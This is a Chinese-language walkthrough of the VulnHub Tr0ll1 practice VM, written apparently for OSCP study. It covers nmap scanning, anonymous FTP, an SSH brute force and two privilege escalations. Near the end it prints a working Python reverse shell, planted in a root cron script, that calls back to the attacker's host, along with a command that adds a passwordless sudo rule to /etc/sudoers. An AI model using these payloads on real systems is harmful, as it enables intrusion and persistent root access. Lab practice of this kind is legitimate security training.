前言
oscp备考,oscp系列——Tr0ll1靶场,两种提权方式,ftp匿名登录,ssh爆破,ubuntu内核提权,计划任务
难度简单
- 对于低权限shell获取涉及:ftp匿名登录,ssh爆破
- 对于提权:ubuntu内核提权,计划任务
下载地址:
https://www.vulnhub.com/entry/tr0ll-1,100/
nmap
主机存活
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:19 CST
Nmap scan report for 10.10.10.1
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.141
Host is up (0.00038s latency).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:FB:0C:2B (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds端口扫描
└─# nmap --min-rate 10000 -p- 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:20 CST
Nmap scan report for 10.10.10.141
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:96:4F:09 (VMware)Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds详细端口扫描
└─# nmap -sV -sT -sC -O -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:21 CST
Nmap scan report for 10.10.10.141
Host is up (0.00060s latency).PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.10.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 secondsvuln扫描
└─# nmap --script=vuln -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:22 CST
Nmap scan report for 10.10.10.141
Host is up (0.00053s latency).PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /robots.txt: Robots file
|_ /secret/: Potentially interesting folder
MAC Address: 00:0C:29:96:4F:09 (VMware)Nmap done: 1 IP address (1 host up) scanned in 321.30 seconds信息收集
ftp,21
nmap扫描出来有匿名登录
下载下来查看一下
└─# strings lol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap
发现存在目录/sup3rs3cr3tdirlol
web页面,80
查看一下源码,发现图片名字叫hacker,下载下来查看
查看源码没有发现什么有用的信息
目录扫描
和nmap扫描出来一样
/robots.txt
/secret/
/sup3rs3cr3tdirlol目录下载文件
发现目录0x0856BF
发现两个文件夹
可能是用户名的文件内容
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
可能是密码的文件内容
Good_job_:)
漏洞利用
ssh爆破
尝试ssh爆破
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
maleus
ps-aux
felux
Eagle11
root
密码
Good_job_:)
good_job_:)
Pass.txt
password
成功得到账号密码
overflow/Pass.txt
ssh连接成功
提权
ubuntu内核提权
查看一下版本
overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
overflow@troll:/$ lsb_release
No LSB modules are available.
overflow@troll:/$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
版本比较低,尝试内核提权,搜索一下,发现这个比较适合
尝试利用成功
获得root权限
计划任务
发现存在计划任务
find / -uid 0 -perm -o+w -type f 2>/dev/null | grep -v -E '/proc|/sys'
find / -name "*cronlog*" 2>/dev/null
得到
/lib/log/cleaner.py
使用vim写入一下反弹shell脚本
import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.10.128",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
也可以直接更改sudo权限为最高权限,然后直接sudo /bin/bash即可直接获取root权限
echo "overflow All=(All)NOPASSWD:ALL" >> /etc/sudoers